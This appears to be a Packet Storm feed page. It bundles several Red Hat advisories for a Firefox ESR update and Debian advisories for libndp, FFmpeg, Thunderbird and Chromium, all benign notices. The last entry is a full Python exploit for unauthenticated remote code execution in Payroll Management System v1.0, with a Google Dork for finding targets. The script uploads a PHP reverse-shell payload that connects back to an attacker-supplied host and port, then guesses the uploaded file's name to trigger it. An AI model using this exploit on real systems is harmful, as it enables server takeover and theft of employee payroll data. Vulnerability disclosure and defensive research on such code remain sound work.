Red Hat Security Advisory 2024-3953-03 - An update for firefox is now available for Red Hat Enterprise Linux 8.4 Advanced Mission Critical Update Support, Red Hat Enterprise Linux 8.4 Telecommunications Update Service, and Red Hat Enterprise Linux 8.4 Update Services for SAP Solutions. Issues addressed include bypass and use-after-free vulnerabilities.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_3953.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: firefox security updateAdvisory ID:        RHSA-2024:3953-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:3953Issue date:         2024-06-17Revision:           03CVE Names:          CVE-2024-5688====================================================================Summary: An update for firefox is now available for Red Hat Enterprise Linux 8.4 Advanced Mission Critical Update Support, Red Hat Enterprise Linux 8.4 Telecommunications Update Service, and Red Hat Enterprise Linux 8.4 Update Services for SAP Solutions.Red Hat Product Security has rated this update as having a security impact ofImportant. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Mozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability.This update upgrades Firefox to version 115.12.0 ESR.Security Fix(es):  * firefox: Use-after-free in networking (CVE-2024-5702)* firefox: Use-after-free in JavaScript object transplant (CVE-2024-5688)* firefox: External protocol handlers leaked by timing attack (CVE-2024-5690)* firefox:  Sandboxed iframes were able to bypass sandbox restrictions to open a new window (CVE-2024-5691)* firefox: Cross-Origin Image leak via Offscreen Canvas (CVE-2024-5693)* firefox: Memory Corruption in Text Fragments (CVE-2024-5696)* firefox: Memory safety bugs fixed in Firefox 127, Firefox ESR 115.12, and Thunderbird 115.12 (CVE-2024-5700) For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-5688References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2291394https://bugzilla.redhat.com/show_bug.cgi?id=2291395https://bugzilla.redhat.com/show_bug.cgi?id=2291396https://bugzilla.redhat.com/show_bug.cgi?id=2291397https://bugzilla.redhat.com/show_bug.cgi?id=2291399https://bugzilla.redhat.com/show_bug.cgi?id=2291400https://bugzilla.redhat.com/show_bug.cgi?id=2291401

Red Hat Security Advisory 2024-3953-03

Red Hat Security Advisory 2024-3952-03 - An update for firefox is now available for Red Hat Enterprise Linux 8.2 Advanced Update Support. Issues addressed include bypass and use-after-free vulnerabilities.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_3952.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: firefox security update  
Advisory ID:        RHSA-2024:3952-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:3952  
Issue date:         2024-06-17  
Revision:           03  
CVE Names:          CVE-2024-5688  
====================================================================

Summary: 

An update for firefox is now available for Red Hat Enterprise Linux 8.2 Advanced Update Support.

Red Hat Product Security has rated this update as having a security impact of  
Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Mozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability.

This update upgrades Firefox to version 115.12.0 ESR.

Security Fix(es):  
* firefox: Use-after-free in networking (CVE-2024-5702)

* firefox: Use-after-free in JavaScript object transplant (CVE-2024-5688)

* firefox: External protocol handlers leaked by timing attack (CVE-2024-5690)

* firefox:  Sandboxed iframes were able to bypass sandbox restrictions to open a new window (CVE-2024-5691)

* firefox: Cross-Origin Image leak via Offscreen Canvas (CVE-2024-5693)

* firefox: Memory Corruption in Text Fragments (CVE-2024-5696)

* firefox: Memory safety bugs fixed in Firefox 127, Firefox ESR 115.12, and Thunderbird 115.12 (CVE-2024-5700) 

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2024-5688

References:

https://access.redhat.com/security/updates/classification/#important  
https://bugzilla.redhat.com/show_bug.cgi?id=2291394  
https://bugzilla.redhat.com/show_bug.cgi?id=2291395  
https://bugzilla.redhat.com/show_bug.cgi?id=2291396  
https://bugzilla.redhat.com/show_bug.cgi?id=2291397  
https://bugzilla.redhat.com/show_bug.cgi?id=2291399  
https://bugzilla.redhat.com/show_bug.cgi?id=2291400  
https://bugzilla.redhat.com/show_bug.cgi?id=2291401

Red Hat Security Advisory 2024-3952-03

Red Hat Security Advisory 2024-3951-03 - An update for firefox is now available for Red Hat Enterprise Linux 7. Issues addressed include bypass and use-after-free vulnerabilities.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_3951.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: firefox security update  
Advisory ID:        RHSA-2024:3951-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:3951  
Issue date:         2024-06-17  
Revision:           03  
CVE Names:          CVE-2024-5688  
====================================================================

Summary: 

An update for firefox is now available for Red Hat Enterprise Linux 7.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Mozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability.

This update upgrades Firefox to version 115.12.0 ESR.

Security Fix(es):

* firefox: Use-after-free in networking (CVE-2024-5702)

* firefox: Use-after-free in JavaScript object transplant (CVE-2024-5688)

* firefox: External protocol handlers leaked by timing attack (CVE-2024-5690)

* firefox:  Sandboxed iframes were able to bypass sandbox restrictions to open a new window (CVE-2024-5691)

* firefox: Cross-Origin Image leak via Offscreen Canvas (CVE-2024-5693)

* firefox: Memory Corruption in Text Fragments (CVE-2024-5696)

* firefox: Memory safety bugs fixed in Firefox 127, Firefox ESR 115.12, and Thunderbird 115.12 (CVE-2024-5700) 

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2024-5688

References:

https://access.redhat.com/security/updates/classification/#important  
https://bugzilla.redhat.com/show_bug.cgi?id=2291394  
https://bugzilla.redhat.com/show_bug.cgi?id=2291395  
https://bugzilla.redhat.com/show_bug.cgi?id=2291396  
https://bugzilla.redhat.com/show_bug.cgi?id=2291397  
https://bugzilla.redhat.com/show_bug.cgi?id=2291399  
https://bugzilla.redhat.com/show_bug.cgi?id=2291400  
https://bugzilla.redhat.com/show_bug.cgi?id=2291401

Red Hat Security Advisory 2024-3951-03

Red Hat Security Advisory 2024-3950-03 - An update for firefox is now available for Red Hat Enterprise Linux 8.8 Extended Update Support. Issues addressed include bypass and use-after-free vulnerabilities.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_3950.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: firefox security update  
Advisory ID:        RHSA-2024:3950-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:3950  
Issue date:         2024-06-17  
Revision:           03  
CVE Names:          CVE-2024-5688  
====================================================================

Summary: 

An update for firefox is now available for Red Hat Enterprise Linux 8.8 Extended Update Support.

Red Hat Product Security has rated this update as having a security impact of  
Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Mozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability.

This update upgrades Firefox to version 115.12.0 ESR.

Security Fix(es):

* firefox: Use-after-free in networking (CVE-2024-5702)

* firefox: Use-after-free in JavaScript object transplant (CVE-2024-5688)

* firefox: External protocol handlers leaked by timing attack (CVE-2024-5690)

* firefox:  Sandboxed iframes were able to bypass sandbox restrictions to open a new window (CVE-2024-5691)

* firefox: Cross-Origin Image leak via Offscreen Canvas (CVE-2024-5693)

* firefox: Memory Corruption in Text Fragments (CVE-2024-5696)

* firefox: Memory safety bugs fixed in Firefox 127, Firefox ESR 115.12, and Thunderbird 115.12 (CVE-2024-5700) 

 For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2024-5688

References:

https://access.redhat.com/security/updates/classification/#important  
https://bugzilla.redhat.com/show_bug.cgi?id=2291394  
https://bugzilla.redhat.com/show_bug.cgi?id=2291395  
https://bugzilla.redhat.com/show_bug.cgi?id=2291396  
https://bugzilla.redhat.com/show_bug.cgi?id=2291397  
https://bugzilla.redhat.com/show_bug.cgi?id=2291399  
https://bugzilla.redhat.com/show_bug.cgi?id=2291400  
https://bugzilla.redhat.com/show_bug.cgi?id=2291401

Red Hat Security Advisory 2024-3950-03

Red Hat Security Advisory 2024-3949-03 - An update for firefox is now available for Red Hat Enterprise Linux 9.2 Extended Update Support. Issues addressed include bypass and use-after-free vulnerabilities.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_3949.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: firefox security update  
Advisory ID:        RHSA-2024:3949-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:3949  
Issue date:         2024-06-17  
Revision:           03  
CVE Names:          CVE-2024-5688  
====================================================================

Summary: 

An update for firefox is now available for Red Hat Enterprise Linux 9.2 Extended Update Support.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Mozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability.

This update upgrades Firefox to version 115.12.0 ESR.

Security Fix(es):

* firefox: Use-after-free in networking (CVE-2024-5702)

* firefox: Use-after-free in JavaScript object transplant (CVE-2024-5688)

* firefox: External protocol handlers leaked by timing attack (CVE-2024-5690)

* firefox:  Sandboxed iframes were able to bypass sandbox restrictions to open a new window (CVE-2024-5691)

* firefox: Cross-Origin Image leak via Offscreen Canvas (CVE-2024-5693)

* firefox: Memory Corruption in Text Fragments (CVE-2024-5696)

* firefox: Memory safety bugs fixed in Firefox 127, Firefox ESR 115.12, and Thunderbird 115.12 (CVE-2024-5700) 

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2024-5688

References:

https://access.redhat.com/security/updates/classification/#important  
https://bugzilla.redhat.com/show_bug.cgi?id=2291394  
https://bugzilla.redhat.com/show_bug.cgi?id=2291395  
https://bugzilla.redhat.com/show_bug.cgi?id=2291396  
https://bugzilla.redhat.com/show_bug.cgi?id=2291397  
https://bugzilla.redhat.com/show_bug.cgi?id=2291399  
https://bugzilla.redhat.com/show_bug.cgi?id=2291400  
https://bugzilla.redhat.com/show_bug.cgi?id=2291401

Red Hat Security Advisory 2024-3949-03

Debian Linux Security Advisory 5713-1 - A buffer overflow was discovered in libndp, a library implementing the IPv6 Neighbor Discovery Protocol (NDP), which could result in denial of service or potentially the execution of arbitrary code if malformed IPv6 router advertisements are processed.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5713-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffJune 16, 2024                         https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : libndpCVE ID         : CVE-2024-5564A buffer overflow was discovered in libndp, a library implementing theIPv6 Neighbor Discovery Protocol (NDP), which could result in denial ofservice or potentially the execution of arbitrary code if malformedIPv6 router advertisements are processed.For the oldstable distribution (bullseye), this problem has been fixedin version 1.6-1+deb11u1.For the stable distribution (bookworm), this problem has been fixed inversion 1.8-1+deb12u1.We recommend that you upgrade your libndp packages.For the detailed security status of libndp please refer toits security tracker page at:https://security-tracker.debian.org/tracker/libndpFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmZvJhIACgkQEMKTtsN8TjaFxRAAoZ0KcqyXTKSql5dnEURXQPpbzVnjYd4xnEzbunVupRTJnFmDpF/huBYl+Owh85Et0uUvEwYZIGb5bt47jStw4iBHYSG7AaWWPWmlqPT2izu461AL1njjDJh0i3BPGxTm1lY1k8tnUZkPp08BonJKnesSsogiFy51L0Apmug3/UJu9HrsUGGeVsI3oFHgxQWAe92f/9mTzst0J1BoGYC66n2CUISVUBUmyCBBKiPWbzVX5fSMu5ZAgRCCm+8VcEgFG2zZmOxaWqhlKmWNcraAsJmi4Y4Isp7AsmYFjHogY/jURDf5Y/CcdGuKwyGThk0sU67kbEgQDkCW+40OGU+WuEE+5cU5FytNZzNunsu9BZM+YqwrtRHBZhmJMr1+io9pJaX/a2wQqiHxOsb8wKbWnykDmgXRHd3qAj/XzRjzipebfr+5N7wOee8JritwniCimSSD3Uaev7HdFWO6DbhQZNH+EKpSgAZY0JlM96yIUafH6dwnH3NM/bBYP0iEbm+bXE8emF4XfkAU5TZuvPmsQgKCf8idgcHAE9a0jSv8e5bi4JNa0adLO+0B9RtuOhRGjhTtkkzwYeU1/07vGnQrZasDjZoFgHcnrXqD8hDFVYX4z8T4pn0AMe1BXLaAx83D8JOX2SqP6qiiwOGViSDyZl/JUGQ/zmUf2rEDU6fXBic==ilxi-----END PGP SIGNATURE-----

Debian Security Advisory 5713-1

Debian Linux Security Advisory 5712-1 - Several vulnerabilities have been discovered in the FFmpeg multimedia framework, which could result in denial of service or potentially the execution of arbitrary code if malformed files/streams are processed.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5712-1                   security@debian.org  
https://www.debian.org/security/                       Moritz Muehlenhoff  
June 15, 2024                         https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : ffmpeg  
CVE ID         : CVE-2023-50010 CVE-2023-51793 CVE-2023-51794  
                 CVE-2023-51795 CVE-2023-51798 CVE-2024-31585

Several vulnerabilities have been discovered in the FFmpeg multimedia  
framework, which could result in denial of service or potentially the  
execution of arbitrary code if malformed files/streams are processed.

For the stable distribution (bookworm), these problems have been fixed in  
version 7:5.1.5-0+deb12u1.

We recommend that you upgrade your ffmpeg packages.

For the detailed security status of ffmpeg please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/ffmpeg

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmZt3FoACgkQEMKTtsN8  
TjZddQ/+M8SG7jUGvMp5yfB+cMC8/ycNNpZBVObPfxJPg8XYTEXq+ayMd0uGdQO8  
AjaLh+Z7/OOJQ5ZpVHTMcE+bmCV+vAAoYyprz/uX8QstMKkiHZ2/SE/1zNrYuAMC  
JnmX8jTPNDMjFxoXYH/a2+QVmH5/Wo5GmCHStYRfIdVqkG11s76bcrVdYQ99zhek  
NfOErXzd70z6zdk6KIMHLpFHbJCDSsWlHQPPvDidaMrGyVIs6mfh6tfcBfmTTB3m  
wpsTs/Z9prDRFMZUsph4AkMncYO9vfgWwervOckVDMosfuoSMo26DvaKqDUho20s  
Ej5S4tcgzzJ+L68itXoAfMLIc7ErjX+sMNPQB7Q4HnXwKH5fXkPIhmMoOC6NUPoe  
6DQpg0rabcJajdZM2wfnvpnyLf7dzCHjjTQD4CBL6vQp9U6MNK5nme/P5EjJAcI7  
TdT3VfLsi0QCZRnX0B71meCTUzg1BXThnhUriAaLF2QIpFuJs0qMwos7GLFtGXAD  
06WY6ctpiZ8F38v4y9W3O+FXOat8BBW3kOYc/FETEYXtjt9nnCy2AuwWrJ3oKNpE  
qaOI9ikfBbLxCXSW/G9RBSId6vK5tQeeypKY1sYwHRmVOeY8v7rtgi6x7uXHBktV  
sWTXFqtF3HlA8jLpJQjemMGNvLpGaOTK331IRNkSGygtcUrGAGQ=  
=nhZN  
-----END PGP SIGNATURE-----

Debian Security Advisory 5712-1

Debian Linux Security Advisory 5711-1 - Multiple security issues were discovered in Thunderbird, which could result in the execution of arbitrary code.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5711-1                   security@debian.org  
https://www.debian.org/security/                       Moritz Muehlenhoff  
June 15, 2024                         https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : thunderbird  
CVE ID         : CVE-2024-5688 CVE-2024-5690 CVE-2024-5691 CVE-2024-5693   
                 CVE-2024-5696 CVE-2024-5700 CVE-2024-5702

Multiple security issues were discovered in Thunderbird, which could  
result inthe execution of arbitrary code.

For the oldstable distribution (bullseye), these problems have been fixed  
in version 1:115.12.0-1~deb11u1.

For the stable distribution (bookworm), these problems have been fixed in  
version 1:115.12.0-1~deb12u1.

We recommend that you upgrade your thunderbird packages.

For the detailed security status of thunderbird please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/thunderbird

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmZto9cACgkQEMKTtsN8  
TjZXBhAAnSaDt9MYqXeJPvQm03CRoMX4NgoOoOX9Zx5lGKFHH44Ghy+ZbSc4jor6  
wEIBlrw9TpE4Cvgi6dfAtRCP9owpOl5M75FK8/YDIudPq349SJbRZRGXs0CPY5fL  
zxG5WcLPqRGT9S5wm+LQ9u2BcyOOTyDa1ICl1JQ+vPOY0r/7jjojbbkPh61a3UTq  
JGbwPYhsE4DZW6CG5OsOvzoX8/9docjO/DnTg2X6SM11Ti7IK77VJ02aT4F1dEby  
TXD5SUWws1euRgLQBY0qaOB1kbXfQJTpx6StV7aaGVfC07qQyv+PZgW9xEpbGyIF  
oGcOtTHZStQHnbQRonChBYmWjkDahmrVET73VY1gpv6nggNy9z3RcTjyWzobHBX3  
lfXJpvxtPF9/UpK2V6N5rd25F7Fq65Ldip8H/uCgJ2nL2u6qFSwrfujeaInoeDKk  
DpvkZXHJDFkim2uxjAnD1FVo88K4xa4cI8eUvN28VB1I0E+h4yHN4eIK3AgBlAiX  
+y9KoaMLVUdz29RZ/i2UngnX2K8V0P7Wqxk/SacMDiHuRt2LUt0yQQAmsSgb9CBb  
ajhbwAj/do+gsmroCz941w0O5pbmZ2Ggxqx8FiX223LwR7255IYj3qYWQd0kGXFr  
FxsZgxLryBMgBQuoDZVslO0rZ/klVZyDYS6S0C7+31lSfQAk7Og=  
=dDKM  
-----END PGP SIGNATURE-----

Debian Security Advisory 5711-1

Debian Linux Security Advisory 5710-1 - Security issues were discovered in Chromium, which could result in the execution of arbitrary code, denial of service or information disclosure.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256- -------------------------------------------------------------------------Debian Security Advisory DSA-5710-1                   security@debian.orghttps://www.debian.org/security/                           Andres SalomonJune 14, 2024                         https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : chromiumCVE ID         : CVE-2024-5830 CVE-2024-5831 CVE-2024-5832 CVE-2024-5833                  CVE-2024-5834 CVE-2024-5835 CVE-2024-5836 CVE-2024-5837                  CVE-2024-5838 CVE-2024-5839 CVE-2024-5840 CVE-2024-5841                  CVE-2024-5842 CVE-2024-5843 CVE-2024-5844 CVE-2024-5845                  CVE-2024-5846 CVE-2024-5847Security issues were discovered in Chromium, which could resultin the execution of arbitrary code, denial of service or informationdisclosure.For the stable distribution (bookworm), these problems have been fixed inversion 126.0.6478.56-1~deb12u1.We recommend that you upgrade your chromium packages.For the detailed security status of chromium please refer toits security tracker page at:https://security-tracker.debian.org/tracker/chromiumFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCAAdFiEEUAUk+X1YiTIjs19qZF0CR8NudjcFAmZsdK8ACgkQZF0CR8NudjdfEg//VIIK1hEPZju418flr9luWXi/NKh1PcwFVhDusF5V4q5zBIsqb/5oTuwo5dmZtj5muKUmC4WVhnSqwNtA+ctpr9HPxEcRrOORl2QCeYvdDQYOAFQR4StDAjOPFn196YlDrJ58b5mLez+6f6CpsrCV9XNH37v+nxB3FjwfGSUeLT2GcdArRdfxlFuMp7uKZ5Cg9jID2LeOf86sjIYMxZSMQ7lsqtQYFsXwYsHDCUzGqaQR1qS5IF1eQjTveHwKySMpe3HX9A3mkSZz05cgrmJNvuTbiD3DF5MiwiBxS+zH3pkfrE5OJjahmcw0lUHhvpd3zD2+4uuotIGWJ0OdfbOvbO+r4g2K3CoKFVoyBut1Mu721maoQ51fLsSlHBNu/jirIUi8TgZtOiSbNPAV4O6B8qOznnaeGic4uGFhg3R/lfrQSVSxrJG3NYBCBDjd5P4WrT8VkCCmkwVN3MTEuLRCA6Xj7O1h1GZrxsWxn0ySDzyl2aQCOiZXbxYGae3GzivetQyf8fpjZ2r4zCIxXZ58E+j9Xa32mpl/2xecazaYOv3QXSWO/zaRONCc0JoS5t3V5TU/p9jwDqV+DVYTd8unm7OcAumpQ7K8rPOZ24tjQjLg+wO5d6rFF80Vnz4RFKYsIJukoHJHb1R9DOzF/ufsj7//XzsaYc30Y6ni1HCivNU==p6S/-----END PGP SIGNATURE-----

Debian Security Advisory 5710-1

Payroll Management System version 1.0 suffers from a remote code execution vulnerability.

    # Exploit Title: Payroll Management System v1.0 RCE (Unauthenticated)# Google Dork: intitle:"Employee's Payroll Management System"# Date: 16/06/2024# Exploit Author: ShellUnease# Vendor Homepage: https://www.sourcecodester.com/# Software Link: https://www.sourcecodester.com/php/14475/payroll-management-system-using-phpmysql-source-code.html# Version: v1.0# Tested on: Kali Linux Apache Web Server# CVE : CVE-2024-34833#!/usr/bin/pythonimport argparseimport timeimport requestsclass Exploit:    def __init__(self, rhost, rport, lhost, lport, https):        self.rhost = rhost        self.rport = rport        self.lhost = lhost        self.lport = lport        self.targetUrl = f'https://{rhost}:{rport}' if https else f'http://{rhost}:{rport}'        self.banner()    def banner(self):        print("""  _____                      _ _                                |  __ \                    | | |                               | |__) |_ _ _   _ _ __ ___ | | |                               |  ___/ _` | | | | '__/ _ \| | |                               | |  | (_| | |_| | | | (_) | | |                               |_|  _\__,_|\__, |_|  \___/|_|_|                          _    |  \/  |     __/ |                                       | |   | \  / | __ |___/_   __ _  __ _  ___ _ __ ___   ___ _ __ | |_  | |\/| |/ _` | '_ \ / _` |/ _` |/ _ \ '_ ` _ \ / _ \ '_ \| __| | |  | | (_| | | | | (_| | (_| |  __/ | | | | |  __/ | | | |_  |_|__|_|\__,_|_| |_|\__,_|\__, |\___|_|_|_| |_|\___|_|_|_|\__|  / ____|         | |       __/ |     |  __ \ / ____|  ____|    | (___  _   _ ___| |_ ___ |___/___   | |__) | |    | |__        \___ \| | | / __| __/ _ \ '_ ` _ \  |  _  /| |    |  __|       ____) | |_| \__ \ ||  __/ | | | | | | | \ \| |____| |____     |_____/ \__, |___/\__\___|_| |_| |_| |_|  \_\\_____|______|             __/ |                                                         |___/                                                          """)    def get_data(self):        return {            'name': 'John Doe',            'email': 'jdoe@gmail.com',            'contact': 'John Doe',            'about': 'John Doe',        }    def get_payload(self):        return (f'<?php $sock=fsockopen("{self.lhost}",{self.lport});$proc=proc_open("sh", array(0=>$sock, 1=>$sock, '                f'2=>$sock),$pipes); ?>')    def upload_rev_shell(self):        url = f'{self.targetUrl}/ajax.php?action=save_settings'        print(f'Uploading a reverse shell via {url}')        requests.post(url, files={'img': ('a.php', self.get_payload())},                      data=self.get_data())        epoch = time.time()        timestamp = epoch - (epoch % 60)        timestamp_minus_one_min = timestamp - 60        timestamp_plus_one_min = timestamp + 60        return [f'{int(timestamp)}_a.php', f'{int(timestamp_minus_one_min)}_a.php',                f'{int(timestamp_plus_one_min)}_a.php']    def open_rev_shell(self, candidates):        print('Opening a reverse shell')        for candidate in candidates:            url = f'{self.targetUrl}/assets/img/{candidate}'            try:                requests.get(url).raise_for_status()                print(f'Got a success response for {url}, you should have a revshell')                return            except Exception as e:                print(f'Failed to open revshell using {url}')        print('Guessing filename failed')    def exploit(self):        candidates = self.upload_rev_shell()        self.open_rev_shell(candidates)def get_args():    parser = argparse.ArgumentParser(        description='Payroll Management System - Remote Code Execution (RCE) (Unauthenticated)')    parser.add_argument('-rhost', '--remote-host', dest="rhost", required=True, action='store', help='Remote host')    parser.add_argument('-rport', '--remote-port', dest="rport", required=False, action='store', help='Remote port',                        default=80)    parser.add_argument('-lhost', '--local-host', dest="lhost", required=True, action='store', help='Local host')    parser.add_argument('-lport', '--local-port', dest="lport", required=True, action='store', help='Local port')    parser.add_argument('-https', '--https', dest="https", required=False, action='store_true', help='Use https')    args = parser.parse_args()    return argsif __name__ == '__main__':    args = get_args()    exp = Exploit(args.rhost, args.rport, args.lhost, args.lport, args.https)    exp.exploit()

Tag

#linux